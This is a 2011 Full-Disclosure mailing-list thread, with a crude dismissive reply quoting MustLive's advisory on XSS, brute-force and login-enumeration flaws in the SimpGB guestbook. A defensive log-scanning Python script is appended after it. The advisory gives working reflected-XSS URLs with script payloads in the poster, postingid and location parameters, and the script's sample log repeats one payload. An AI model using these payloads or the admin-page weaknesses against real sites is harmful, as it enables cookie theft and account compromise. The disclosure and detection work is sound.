Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
- To: MustLive <mustlive@xxxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
- From: laurent gaffie <laurent.gaffie@xxxxxxxxx>
- Date: Thu, 27 Jan 2011 02:09:10 +1100
Send your shitty stuff to bugtraq@xxxxxxxxxxxxxxxxx
If it's not obvious, no one gives a shit here, seriously.
2011/1/27 MustLive <mustlive@xxxxxxxxxxxxxxxxxx>
> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are SimpGB v1.49.02 and previous versions.
>
> ----------
> Details:
> ----------
>
> XSS (WASC-08):
>
> POST request at page http://site/guestbook.php in parameters poster,
> postingid and location in Preview function. If captcha is used in the
> guestbook, then working code of the captcha is required for the attack. Or
> via GET request:
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> ------------
> Timeline:
> ------------
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
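
A defender-side check for the reflected XSS described in the quoted advisory, added here as an example and not part of the original thread or SimpGB's code: it scans web server access log lines for Preview requests to guestbook.php whose poster, postingid or location value decodes to markup characters. The combined log format, the function name and the sample lines are assumptions; POST bodies do not appear in access logs, so this covers only the GET variant.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters the advisory names as reflected by the Preview function.
WATCHED = ("poster", "postingid", "location")
# Characters that let a value break out of an attribute or open a tag.
MARKUP = re.compile(r'[<>"]')
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_preview_requests(log_lines):
    """Return (line_number, parameter, decoded_value) for each flagged value."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a parsable request line
        url = urlsplit(match.group(1))
        if not url.path.endswith("/guestbook.php"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        if "preview" not in query:
            continue  # the advisory locates the reflection in Preview
        for name in WATCHED:
            for value in query.get(name, []):
                # parse_qs decodes once; decode again to catch double encoding.
                decoded = unquote(value)
                if MARKUP.search(decoded):
                    hits.append((number, name, decoded))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jan/2011:02:00:01 +0000] "GET /guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=Anna&input_text=hello&preview=preview HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Jan/2011:02:00:07 +0000] "GET /guestbook.php?mode=add&postingid=1&poster=%3Cscript%3Ealert(1)%3C/script%3E&preview=preview HTTP/1.1" 200 5170',
    '192.0.2.44 - - [27/Jan/2011:02:00:09 +0000] "GET /guestbook.php?mode=add&postingid=1&poster=1&location=%2522%253E%253Cb%253E&preview=preview HTTP/1.1" 200 5133',
    '192.0.2.51 - - [27/Jan/2011:02:00:12 +0000] "GET /guestbook.php?mode=add&poster=%3Cb%3E HTTP/1.1" 200 4990',
]

if __name__ == "__main__":
    for hit in suspicious_preview_requests(SAMPLE_LOG):
        print(hit)
```

A legitimate name or location containing a double quote will also be flagged, so treat hits as candidates for triage rather than confirmed attempts.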